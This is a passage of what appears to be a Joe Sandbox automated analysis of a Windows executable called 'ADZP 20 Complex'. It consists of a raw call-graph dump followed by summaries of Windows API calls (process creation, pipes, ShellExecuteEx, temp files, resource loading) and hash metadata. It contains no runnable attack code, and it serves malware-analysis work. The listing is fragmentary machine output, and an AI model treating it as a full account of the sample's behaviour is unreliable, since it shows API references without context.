calls 9412->9413 9414 40234b 9413->9414 9414->8500 9415->8397 9416->8405 9418 40a24d 9417->9418 9419 40e900 3 API calls 9418->9419 9420 40a26b 9419->9420 9421 40a271 memcpy 9420->9421 9422 40a27f 9420->9422 9421->9422 9422->9318 9423->9321 9426 405fa1 9424->9426 9425 40e880 TlsGetValue 9427 406014 9425->9427 9426->9425 9426->9426 9428 40e900 3 API calls 9427->9428 9429 406022 9428->9429 9431 406032 9429->9431 9432 40ea10 TlsGetValue 9429->9432 9431->9325 9432->9431 9433->9347 9434->9338 9436 408e60 wcslen HeapAlloc 9435->9436 9437 408e96 9435->9437 9436->9437 9438 408e86 wcscpy 9436->9438 9437->9358 9438->9358 9440 409032 9439->9440 9441 4094e2 GetWindowThreadProcessId GetCurrentProcessId 9439->9441 9442 409588 9440->9442 9441->9440 9443 409592 EnumWindows 9442->9443 9451 4095dd 9442->9451 9444 4095af 9443->9444 9449 40903e 9443->9449 9457 409507 GetWindowThreadProcessId GetCurrentThreadId 9443->9457 9446 4095b1 GetCurrentThreadId 9444->9446 9447 4095c4 SetWindowPos 9444->9447 9444->9449 9445 4095ea GetCurrentThreadId 9445->9451 9446->9444 9447->9444 9448 409600 EnableWindow 9448->9451 9449->9369 9449->9370 9450 409611 SetWindowPos 9450->9451 9451->9445 9451->9448 9451->9449 9451->9450 9452 40e1b2 HeapFree 9451->9452 9452->9451 9453->9376 9455 408ea1 HeapFree 9454->9455 9456 408eb3 9454->9456 9455->9456 9456->9385 9458 409525 IsWindowVisible 9457->9458 9459 40957f 9457->9459 9458->9459 9460 409530 9458->9460 9461 40e1f2 HeapAlloc 9460->9461 9462 40953c GetCurrentThreadId GetWindowLongW 9461->9462 9463 40955a 9462->9463 9464 40955e GetForegroundWindow 9462->9464 9463->9464 9464->9459 9465 409568 IsWindowEnabled 9464->9465 9465->9459 9466 409573 EnableWindow 9465->9466 9466->9459 9467->8509 9468->8512 9470 40e900 3 API calls 9469->9470 9471 40ade9 GetTempPathW LoadLibraryW 9470->9471 9472 40ae24 9471->9472 9473 40ae06 GetProcAddress 9471->9473 9495 40ea90 TlsGetValue 9472->9495 9474 40ae16 GetLongPathNameW 9473->9474 9475 40ae1d FreeLibrary 9473->9475 9474->9475 
9475->9472 9477 401a1e 9477->8517 9478->8520 9479->8524 9496 40ae39 9480->9496 9483 40ad45 9484 40ad54 wcsncpy wcslen 9483->9484 9485 401a7b GetTempFileNameW 9483->9485 9486 40ad88 CreateDirectoryW 9484->9486 9488 40e520 GetLastError TlsGetValue SetLastError 9485->9488 9486->9485 9488->8534 9489->8536 9490->8546 9491->8548 9492->8556 9493->8558 9494->8564 9495->9477 9497 40ae40 9496->9497 9498 401a70 9496->9498 9499 40ae56 DeleteFileW 9497->9499 9500 40ae47 SetFileAttributesW 9497->9500 9498->9483 9499->9498 9500->9499 9501->8577 9503 40afe1 SetCurrentDirectoryW 9502->9503 9504 404759 9502->9504 9503->9504 9504->8586 9505->8664 9506->8699 9507->8609 9508->8618 9510 40e900 3 API calls 9509->9510 9511 40ae87 GetCurrentDirectoryW 9510->9511 9512 40ae97 9511->9512 9578 40ea90 TlsGetValue 9512->9578 9514 40aeae 9514->8634 9515->8610 9516->8617 9517->8633 9519 40e900 3 API calls 9518->9519 9520 40aecf 9519->9520 9521 40aede LoadLibraryW 9520->9521 9530 40af69 9520->9530 9523 40af4b 9521->9523 9524 40aeef GetProcAddress 9521->9524 9522 40af9b 9585 40ea90 TlsGetValue 9522->9585 9579 40afec SHGetFolderLocation 9523->9579 9525 40af40 FreeLibrary 9524->9525 9526 40af04 9524->9526 9525->9522 9525->9523 9526->9525 9533 40af16 wcscpy wcscat wcslen CoTaskMemFree 9526->9533 9530->9522 9531 40afec 4 API calls 9530->9531 9531->9522 9532 4035d8 9532->8662 9533->9525 9534->8622 9535->8638 9536->8635 9537->8645 9538->8639 9539->8658 9540->8646 9541->8665 9542->8659 9543->8681 9544->8666 9545->8685 9546->8673 9547->8691 9548->8686 9549->8701 9551 409368 CoInitialize 9550->9551 9552 409379 memset LoadLibraryW 9550->9552 9551->9552 9553 4093a3 GetProcAddress GetProcAddress 9552->9553 9554 4094ab 9552->9554 9555 4093d2 wcsncpy wcslen 9553->9555 9556 4093cd 9553->9556 9557 40e900 3 API calls 9554->9557 9558 409401 9555->9558 9556->9555 9559 4094b8 9557->9559 9560 4094d1 3 API calls 9558->9560 9586 40ea90 TlsGetValue 9559->9586 9561 40941f 9560->9561 9564 409588 16 API calls 9561->9564 9563 
403772 9563->8713 9565 409442 9564->9565 9566 409588 16 API calls 9565->9566 9567 409457 9566->9567 9568 40949f FreeLibrary 9567->9568 9569 40e900 3 API calls 9567->9569 9568->9554 9568->9559 9570 409468 CoTaskMemFree wcslen 9569->9570 9570->9568 9572 409493 9570->9572 9572->9568 9574 4056e1 timeBeginPeriod 9573->9574 9575 4056f3 Sleep 9573->9575 9574->9575 9576->8687 9577->8702 9578->9514 9580 40b00b SHGetPathFromIDListW 9579->9580 9581 40af53 wcscat wcslen 9579->9581 9582 40b035 CoTaskMemFree 9580->9582 9583 40b019 wcslen 9580->9583 9581->9522 9582->9581 9583->9582 9584 40b026 9583->9584 9584->9582 9585->9532 9586->9563 9587->8734 9588->8736 9589->8742 9590->8744 9591->8748 9592->8765 9593->8767 9594->8770 9595->8773 9596->8779 9597->8786 9598->8788 9599->8790 9600->8792 9601->8796 9602->8802 9603->8804 9604->8806 9605->8808 9606->8812 9607->8818 9608->8820 9609->8822 9610->8824 9611->8828 9612->8834 9613->8836 9614->8838 9615->8840 9616->8844 9617->8850 9619 40e660 21 API calls 9618->9619 9620 403e43 9619->9620 9621 4051a0 3 API calls 9620->9621 9622 403e4c 9621->9622 9623 405060 2 API calls 9622->9623 9624 403e58 FindResourceW 9623->9624 9625 403f13 9624->9625 9626 403e7b 9624->9626 9748 40e520 GetLastError TlsGetValue SetLastError 9625->9748 9627 402664 26 API calls 9626->9627 9629 403e8a 9627->9629 9631 40477d HeapSize 9629->9631 9630 403f1d 9632 40e6c0 4 API calls 9630->9632 9633 403e97 9631->9633 9634 403f25 9632->9634 9695 4011ef 9633->9695 9749 405170 TlsGetValue 9634->9749 9637 403f2c 9642 40e5f0 RtlFreeHeap 9637->9642 9639 403eba 9731 40478d 9639->9731 9640 403edc 9719 40e520 GetLastError TlsGetValue SetLastError 9640->9719 9645 403f43 9642->9645 9644 403ee2 9720 40e520 GetLastError TlsGetValue SetLastError 9644->9720 9648 40e5f0 RtlFreeHeap 9645->9648 9652 403a0d 9648->9652 9650 403eda 9750 40e750 TlsGetValue 9650->9750 9651 403eea 9721 40a330 9651->9721 9652->8853 9655 403f00 9656 40e560 3 API calls 9655->9656 9657 403f0a 9656->9657 9747 40a200 
HeapFree 9657->9747 9659->8856 9660->8862 9661->8868 9662->8874 9663->8880 9664->8882 9665->8884 9666->8888 9667->8890 9827 406310 9668->9827 9671->8896 9672->8898 9673->8900 9674->8904 9675->8906 9676->8912 9677->8914 9678->8926 9679->8928 9681 405060 2 API calls 9680->9681 9682 4023cb 9681->9682 9683 405060 2 API calls 9682->9683 9684 4023d8 9683->9684 9856 40b330 9684->9856 9688 402403 9689 40b050 11 API calls 9688->9689 9690 402410 9689->9690 9691 40e5f0 RtlFreeHeap 9690->9691 9692 402437 9691->9692 9693 40e5f0 RtlFreeHeap 9692->9693 9694 402440 9693->9694 9694->8931 9696 4011f7 9695->9696 9696->9696 9697 405060 2 API calls 9696->9697 9698 401210 9697->9698 9751 405700 9698->9751 9701 40a1e0 HeapSize 9702 401225 9701->9702 9703 40e266 4 API calls 9702->9703 9704 401247 9703->9704 9705 40e266 4 API calls 9704->9705 9706 401265 9705->9706 9707 40e266 4 API calls 9706->9707 9708 4014bd 9707->9708 9709 40e266 4 API calls 9708->9709 9710 4014db 9709->9710 9758 40a200 HeapFree 9710->9758 9712 4014e4 9713 40e5f0 RtlFreeHeap 9712->9713 9714 4014f4 9713->9714 9715 40e3b9 2 API calls 9714->9715 9716 4014fe 9715->9716 9717 40e3b9 2 API calls 9716->9717 9718 401507 9717->9718 9718->9639 9718->9640 9719->9644 9720->9651 9722 40a350 9721->9722 9723 40a3a8 9721->9723 9724 40e900 3 API calls 9722->9724 9725 40a403 MultiByteToWideChar 9723->9725 9726 40a379 9724->9726 9728 40e900 3 API calls 9725->9728 9759 40ea90 TlsGetValue 9726->9759 9730 40a420 MultiByteToWideChar 9728->9730 9729 40a39d 9729->9655 9730->9655 9732 40e660 21 API calls 9731->9732 9733 40479b 9732->9733 9734 405060 2 API calls 9733->9734 9735 4047a7 9734->9735 9736 4047ba 9735->9736 9760 402447 9735->9760 9738 4047cb 9736->9738 9769 40b350 9736->9769 9740 40e5f0 RtlFreeHeap 9738->9740 9741 403ed1 9740->9741 9746 40a200 HeapFree 9741->9746 9742 4047dd 9742->9738 9743 40481d 9742->9743 9780 40b630 9742->9780 9745 40b050 11 API calls 9743->9745 9745->9738 9746->9650 9747->9625 9748->9630 9749->9637 9750->9637 9752 
405710 WideCharToMultiByte 9751->9752 9753 40570b 9751->9753 9754 40a220 RtlAllocateHeap 9752->9754 9753->9752 9755 405730 9754->9755 9756 405736 WideCharToMultiByte 9755->9756 9757 401218 9755->9757 9756->9757 9757->9701 9758->9712 9759->9729 9761 405060 2 API calls 9760->9761 9762 402458 9761->9762 9791 40b420 9762->9791 9765 40247f 9767 40e5f0 RtlFreeHeap 9765->9767 9766 40b050 11 API calls 9766->9765 9768 402497 9767->9768 9768->9736 9770 40db18 5 API calls 9769->9770 9771 40b365 9770->9771 9772 40b417 9771->9772 9773 40b36f CreateFileW 9771->9773 9772->9742 9774 40b390 CreateFileW 9773->9774 9775 40b3ac 9773->9775 9774->9775 9777 40b3cd 9774->9777 9776 40b3b9 HeapAlloc 9775->9776 9775->9777 9776->9777 9778 40da8a 4 API calls 9777->9778 9779 40b40e 9777->9779 9778->9779 9779->9742 9781 40b642 9780->9781 9782 40b695 9780->9782 9783 40b68d 9781->9783 9784 40dad9 2 API calls 9781->9784 9782->9743 9783->9743 9785 40b65a 9784->9785 9786 40b683 9785->9786 9787 40b672 WriteFile 9785->9787 9788 40b664 9785->9788 9786->9743 9787->9786 9816 40b6a0 9788->9816 9790 40b66c 9790->9743 9794 40b140 9791->9794 9793 40246b 9793->9765 9793->9766 9795 40b158 9794->9795 9796 40db18 5 API calls 9795->9796 9797 40b16f 9796->9797 9798 40b322 9797->9798 9799 40b182 9797->9799 9800 40b1be 9797->9800 9798->9793 9801 40b199 9799->9801 9802 40b19c CreateFileW 9799->9802 9803 40b1c3 9800->9803 9804 40b1fc 9800->9804 9801->9802 9809 40b268 9802->9809 9805 40b1da 9803->9805 9806 40b1dd CreateFileW 9803->9806 9807 40b227 CreateFileW 9804->9807 9804->9809 9805->9806 9806->9809 9808 40b249 CreateFileW 9807->9808 9807->9809 9808->9809 9810 40b2a2 9809->9810 9812 40b28e HeapAlloc 9809->9812 9813 40b2f0 9809->9813 9810->9813 9814 40b2dc SetFilePointer 9810->9814 9811 40da8a 4 API calls 9811->9798 9812->9810 9813->9811 9815 40b301 9813->9815 9814->9813 9815->9793 9817 40b7a7 9816->9817 9818 40b6ba 9816->9818 9817->9790 9819 40b6c0 SetFilePointer 9818->9819 9820 40b6eb 9818->9820 9819->9820 9822 
40b0c0 WriteFile 9820->9822 9824 40b6f7 9820->9824 9821 40b727 9821->9790 9823 40b76e 9822->9823 9823->9824 9825 40b775 WriteFile 9823->9825 9824->9821 9826 40b711 memcpy 9824->9826 9825->9790 9826->9790 9828 40631f 9827->9828 9829 406438 9828->9829 9839 4063ae 9828->9839 9830 40e880 TlsGetValue 9829->9830 9831 406442 9830->9831 9832 40645a 9831->9832 9833 40644a _wcsdup 9831->9833 9834 40e880 TlsGetValue 9832->9834 9833->9832 9835 406460 9834->9835 9836 406477 9835->9836 9837 406468 _wcsdup 9835->9837 9838 40e880 TlsGetValue 9836->9838 9837->9836 9840 406480 9838->9840 9841 4063fc wcsncpy 9839->9841 9843 403ad4 9839->9843 9842 406488 _wcsdup 9840->9842 9845 406498 9840->9845 9841->9839 9842->9845 9843->8893 9844 40e900 3 API calls 9846 406520 9844->9846 9845->9844 9847 406572 wcsncpy 9846->9847 9848 406526 9846->9848 9851 40658d 9846->9851 9847->9851 9849 4065e4 9848->9849 9850 4065db free 9848->9850 9852 4065f7 9849->9852 9853 4065eb free 9849->9853 9850->9849 9851->9848 9855 406625 wcsncpy 9851->9855 9852->9843 9854 4065fe free 9852->9854 9853->9852 9854->9843 9855->9851 9857 40b140 15 API calls 9856->9857 9858 4023eb 9857->9858 9858->9690 9859 40b600 9858->9859 9860 40dad9 2 API calls 9859->9860 9861 40b60f 9860->9861 9862 40b623 9861->9862 9865 40b500 9861->9865 9862->9688 9864 40b620 9864->9688 9866 40b5f4 9865->9866 9867 40b514 9865->9867 9866->9864 9867->9866 9868 40b528 9867->9868 9869 40b58d 9867->9869 9870 40b560 9868->9870 9871 40b538 9868->9871 9883 40b7b0 WideCharToMultiByte 9869->9883 9870->9870 9873 40b56b WriteFile 9870->9873 9876 40b6a0 4 API calls 9871->9876 9873->9864 9874 40b5a7 9875 40b5eb 9874->9875 9877 40b5b7 9874->9877 9878 40b5c8 WriteFile 9874->9878 9875->9864 9880 40b55a 9876->9880 9881 40b6a0 4 API calls 9877->9881 9879 40b5dc HeapFree 9878->9879 9879->9875 9880->9864 9882 40b5c2 9881->9882 9882->9879 9884 40b7d5 HeapAlloc 9883->9884 9885 40b80e 9883->9885 9886 40b809 9884->9886 9887 40b7ec WideCharToMultiByte 9884->9887 9885->9874 
9886->9874 9887->9886 9888->8960 9889->8962 9890->8971 9892 4024a3 9891->9892 9892->9892 9893 40e660 21 API calls 9892->9893 9894 4024b5 9893->9894 9895 4051a0 3 API calls 9894->9895 9914 4024be 9895->9914 9896 40253f 9959 40e520 GetLastError TlsGetValue SetLastError 9896->9959 9898 402545 9960 40e520 GetLastError TlsGetValue SetLastError 9898->9960 9899 40e520 GetLastError TlsGetValue SetLastError 9899->9914 9901 40254d GetCommandLineW 9903 40a240 4 API calls 9901->9903 9902 405dc0 3 API calls 9902->9914 9904 40255a 9903->9904 9906 40e560 3 API calls 9904->9906 9905 40e560 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 9905->9914 9907 402564 9906->9907 9961 40e520 GetLastError TlsGetValue SetLastError 9907->9961 9909 40256e 9911 40e6c0 4 API calls 9909->9911 9910 40e6c0 wcslen TlsGetValue RtlReAllocateHeap HeapReAlloc 9910->9914 9912 402576 9911->9912 9913 40e560 3 API calls 9912->9913 9915 402580 PathRemoveArgsW 9913->9915 9914->9896 9914->9899 9914->9902 9914->9905 9914->9910 9916 402597 9915->9916 9917 4025fd 9916->9917 9962 40e520 GetLastError TlsGetValue SetLastError 9916->9962 9919 4099a5 SetEnvironmentVariableW 9917->9919 9921 40260a 9919->9921 9920 4025a9 9922 40e6c0 4 API calls 9920->9922 9975 40e520 GetLastError TlsGetValue SetLastError 9921->9975 9924 4025b6 9922->9924 9963 40e520 GetLastError TlsGetValue SetLastError 9924->9963 9925 402614 9927 40e6c0 4 API calls 9925->9927 9929 40261c 9927->9929 9928 4025bc 9964 40e520 GetLastError TlsGetValue SetLastError 9928->9964 9976 405170 TlsGetValue 9929->9976 9932 402623 9935 40e5f0 RtlFreeHeap 9932->9935 9933 4025c4 9965 40e520 GetLastError TlsGetValue SetLastError 9933->9965 9938 40263b 9935->9938 9936 4025cc 9966 40e520 GetLastError TlsGetValue SetLastError 9936->9966 9940 40e5f0 RtlFreeHeap 9938->9940 9939 4025d4 9967 406110 9939->9967 9942 402644 9940->9942 9944 40e5f0 RtlFreeHeap 9942->9944 9943 4025e5 9974 405182 TlsGetValue 9943->9974 9946 40264d 9944->9946 9948 40e5f0 RtlFreeHeap 9946->9948 9947 
4025ea 9950 402656 9948->9950 9952 40e5f0 RtlFreeHeap 9950->9952 9954 401eb5 9952->9954 9954->8977 9956->8972 9957->8983 9958->8992 9959->9898 9960->9901 9961->9909 9962->9920 9963->9928 9964->9933 9965->9936 9966->9939 9968 406146 9967->9968 9969 406118 9967->9969 9986 40e9e0 TlsGetValue 9968->9986 9977 406080 9969->9977 9971 40614f 9971->9943 9974->9947 9975->9925 9976->9932 9978 40e880 TlsGetValue 9977->9978 9979 40609c 9978->9979 9980 40e900 3 API calls 9979->9980 9981 4060a8 9980->9981 9986->9971 9989->9012 9990->9018 10091->9103 10092->9107 10093->9102 10094->9106 10095->9110 10096->9114 10097->9118 10393 40a46f HeapAlloc 10392->10393 10394 40a558 10392->10394 10393->7888 10393->7889 10419 40a79a 10394->10419 10396 40a560 10397 40dfc6 9 API calls 10396->10397 10398 40a568 HeapFree HeapFree 10397->10398 10399 40a5a3 HeapFree 10398->10399 10400 40a58f 10398->10400 10399->10393 10401 40a590 HeapFree 10400->10401 10401->10401 10402 40a5a2 10401->10402 10402->10399 10404 40deba 10403->10404 10405 40df72 RtlAllocateHeap 10404->10405 10406 40dec6 10404->10406 10408 40df87 10405->10408 10409 40a4f6 HeapAlloc 10405->10409 10426 40e0c3 LoadLibraryW 10406->10426 10408->10409 10411 40dfb0 InitializeCriticalSection 10408->10411 10409->7888 10411->10409 10412 40deeb 10413 40df07 HeapAlloc 10412->10413 10414 40df65 LeaveCriticalSection 10412->10414 10413->10414 10415 40df1d 10413->10415 10414->10409 10417 40de99 6 API calls 10415->10417 10418 40df34 10417->10418 10418->10414 10423 40a7ae 10419->10423 10420 40a7f7 memset 10421 40a810 10420->10421 10421->10396 10422 40a7b9 HeapFree 10422->10423 10423->10420 10423->10422 10424 41242a RtlFreeHeap 10423->10424 10425 40ddcb 3 API calls 10423->10425 10424->10423 10425->10423 10427 40e0e0 GetProcAddress 10426->10427 10428 40e10b InterlockedCompareExchange 10426->10428 10429 40e100 FreeLibrary 10427->10429 10434 40e0f0 10427->10434 10430 40e11b 10428->10430 10431 40e12f InterlockedExchange 10428->10431 10429->10428 10432 40ded5 
EnterCriticalSection 10429->10432 10430->10432 10435 40e120 Sleep 10430->10435 10431->10432 10432->10412 10434->10429 10435->10430 10436->7904 10437->7906 10438->7908 10439->7910 10440->7914 10441->7920 10442->7922 10443->7924 10444->7926 10445->7930 10446->7938 10447->7944 10448->7946 10449->7953 10450->7955 10451->7957 10452->7959 10453->7963 10454->7969 10455->7971 10456->7973 10457->7975 10458->7979 10459->7985 10460->7991 10461->7997 10462->7999 10463->8005 10464->8011 10731 402e03 10732 40e660 21 API calls 10731->10732 10733 402e09 10732->10733 10734 40ab74 5 API calls 10733->10734 10735 402e14 10734->10735 10744 40e520 GetLastError TlsGetValue SetLastError 10735->10744 10737 402e1a 10745 40e520 GetLastError TlsGetValue SetLastError 10737->10745 10739 402e22 10740 40a240 4 API calls 10739->10740 10741 402e2d 10740->10741 10742 40e560 3 API calls 10741->10742 10743 402e3c 10742->10743 10744->10737 10745->10739 10776 406289 10777 406290 10776->10777 10777->10777 10780 40ea90 TlsGetValue 10777->10780 10779 4062b5 10780->10779 10485 40b6a0 10486 40b7a7 10485->10486 10487 40b6ba 10485->10487 10488 40b6c0 SetFilePointer 10487->10488 10489 40b6eb 10487->10489 10488->10489 10491 40b0c0 WriteFile 10489->10491 10493 40b6f7 10489->10493 10490 40b727 10492 40b76e 10491->10492 10492->10493 10494 40b775 WriteFile 10492->10494 10493->10490 10495 40b711 memcpy 10493->10495 10496 40242d 10497 40242f 10496->10497 10498 40e5f0 RtlFreeHeap 10497->10498 10499 402437 10498->10499 10500 40e5f0 RtlFreeHeap 10499->10500 10501 402440 10500->10501

                    Control-flow Graph
                    APIs
                    • memset.MSVCRT ref: 00409A69
                    • CreatePipe.KERNEL32(?,?,?,00000000,?,?,00000000,00000000,00404626,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00409AF1
                    • CreatePipe.KERNEL32(?,?,?,00000000,?,?,00000000,00000000,00404626,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00409B46
                    • CreatePipe.KERNEL32(?,?,?,00000000,?,?,00000000,00000000,00404626,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00409B8C
                    • GetStdHandle.KERNEL32(000000F6), ref: 00409BD6
                    • GetStdHandle.KERNEL32(000000F5), ref: 00409BEA
                    • GetStdHandle.KERNEL32(000000F4), ref: 00409BFE
                    • wcslen.MSVCRT ref: 00409C2A
                    • wcslen.MSVCRT ref: 00409C38
                    • HeapAlloc.KERNEL32(00000000,00000000), ref: 00409C52
                    • wcscpy.MSVCRT ref: 00409C6A
                    • wcscat.MSVCRT ref: 00409C71
                    • wcscat.MSVCRT ref: 00409C7C
                    • wcscpy.MSVCRT ref: 00409C88
                    • wcscat.MSVCRT ref: 00409CA3
                    • wcscat.MSVCRT ref: 00409CB0
                    • CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,?,?,?), ref: 00409CEA
                    • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409D08
                    • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409D14
                    • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409D20
                    • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409D26
                    • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,?,?,?), ref: 00409D3A
                    • EnterCriticalSection.KERNEL32(00418730,?,00000000,?,?,?), ref: 00409D4C
                    • LeaveCriticalSection.KERNEL32(00418730,?,00000000,?,?,?), ref: 00409D63
                    • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409D97
                    • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DAE
                    • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DBA
                    • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DC6
                    • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DD2
                    • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DDE
                    • CloseHandle.KERNEL32(?,?,00000000,?,?,?), ref: 00409DEA
                    • wcslen.MSVCRT ref: 00409E04
                    • wcscpy.MSVCRT ref: 00409E2A
                    • memset.MSVCRT ref: 00409E56
                    • ShellExecuteExW.SHELL32 ref: 00409EB3
                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00409ED2
                    • EnterCriticalSection.KERNEL32(00418730), ref: 00409EE4
                    • LeaveCriticalSection.KERNEL32(00418730), ref: 00409EFB
                      • Part of subcall function 004099C7: GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,00000000,?,?,00409BAF,?), ref: 004099D6
                      • Part of subcall function 004099C7: GetCurrentProcess.KERNEL32(?,00000000,?,?,00409BAF,?), ref: 004099E2
                      • Part of subcall function 004099C7: DuplicateHandle.KERNEL32(00000000,?,?,00409BAF,?), ref: 004099E9
                      • Part of subcall function 004099C7: CloseHandle.KERNEL32(?,?,?,00409BAF,?), ref: 004099F5
                    • HeapFree.KERNEL32(00000000,?), ref: 00409F37
                    Strings
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Handle$Close$CreateCriticalSectionwcscat$PipeProcesswcscpywcslen$CurrentEnterHeapLeaveObjectSingleWaitmemset$AllocDuplicateExecuteFreeShell
                    • String ID: $0A$x
                    • API String ID: 550696126-3693508903
                    • Opcode ID: b00f057bc40639e3ebc36098d4fb4d898885556d00f241ad15d102da0fe35fa9
                    • Instruction ID: 1938edec6f8ec7f018cd84e447521b205a2f1ffc1a01eed9409a43f0bd8935e3
                    • Opcode Fuzzy Hash: b00f057bc40639e3ebc36098d4fb4d898885556d00f241ad15d102da0fe35fa9
                    • Instruction Fuzzy Hash: 8AE15B71908341AFD321DF24D841B9BBBE4FF84350F148A3FF499A2291DB799944CB9A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                      • Part of subcall function 0040E660: TlsGetValue.KERNEL32(0000000D,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417064), ref: 0040E677
                    • GetTempFileNameW.KERNEL32(?,00417024,00000000,00000000,?,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00404519), ref: 00401A3B
                    • GetTempFileNameW.KERNEL32(00417024,00000000,00000000,00000000,?,00000000,00000000,?,00417024,00000000,00000000,?,00000000,00000000,00000400,00000000), ref: 00401A90
                    • GetTempFileNameW.KERNEL32(00417024,00000000,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,?,00417024), ref: 00401AE5
                    • PathAddBackslashW.SHLWAPI(00417024,00000000,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,?,00417024), ref: 00401AF0
                    • PathRenameExtensionW.SHLWAPI(?,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000), ref: 00401B2F
                    • GetTempFileNameW.KERNEL32(00417024,00000000,00000000,?,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,00417024), ref: 00401B49
                      • Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
                      • Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
                      • Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B
                      • Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                      • Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(020A0000,00000000,?), ref: 0040E599
                      • Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7
                      • Part of subcall function 0040E560: RtlReAllocateHeap.NTDLL(020A0000,00000000,?,?), ref: 0040E5BC
                    Strings
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: FileNameTemp$Value$AllocateErrorHeapLastPath$BackslashExtensionRenamewcslen
                    • String ID: $pA$$pA$$pA$$pA
                    • API String ID: 368575804-1531182785
                    • Opcode ID: 43ebda8593a92aa5bcc9b73b08c12452a331b9e9f1a1c6ad17b213a13871d9c3
                    • Instruction ID: 7226354e244135f3a7293121bd0c5faf706f4cf1cd60fca57ba481f11b9cb304
                    • Opcode Fuzzy Hash: 43ebda8593a92aa5bcc9b73b08c12452a331b9e9f1a1c6ad17b213a13871d9c3
                    • Instruction Fuzzy Hash: 3D510F71104304BED600BBB2DC42E7F7A6DEB84308F018C3FB540A50E2EA3D99655A6E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    • memset.MSVCRT ref: 0040100F
                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040101C
                    • HeapCreate.KERNEL32(00000000,00001000,00000000,00000000), ref: 00401035
                      • Part of subcall function 0040E4D0: HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E4DC
                      • Part of subcall function 0040E4D0: TlsAlloc.KERNEL32(?,00401053,00000000,00001000,00000000,00000000), ref: 0040E4E7
                      • Part of subcall function 0040A1C0: HeapCreate.KERNELBASE(00000000,00001000,00000000,0040106C,00000000,00001000,00000000,00000000), ref: 0040A1C9
                      • Part of subcall function 00409669: InitializeCriticalSection.KERNEL32(00418730,00000004,00000004,0040963C,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 00409691
                      • Part of subcall function 00408DEE: memset.MSVCRT ref: 00408DFB
                      • Part of subcall function 00408DEE: InitCommonControlsEx.COMCTL32(00000008,00001000), ref: 00408E15
                      • Part of subcall function 00408DEE: CoInitialize.OLE32(00000000), ref: 00408E1D
                      • Part of subcall function 004053B5: InitializeCriticalSection.KERNEL32(00418708,0040107B,00000000,00001000,00000000,00000000), ref: 004053BA
                    • GetStdHandle.KERNEL32(FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040109A
                      • Part of subcall function 0040A460: HeapAlloc.KERNEL32(00000000,0000003C,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040A47F
                      • Part of subcall function 0040A460: HeapAlloc.KERNEL32(00000008,00000015,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040A4A5
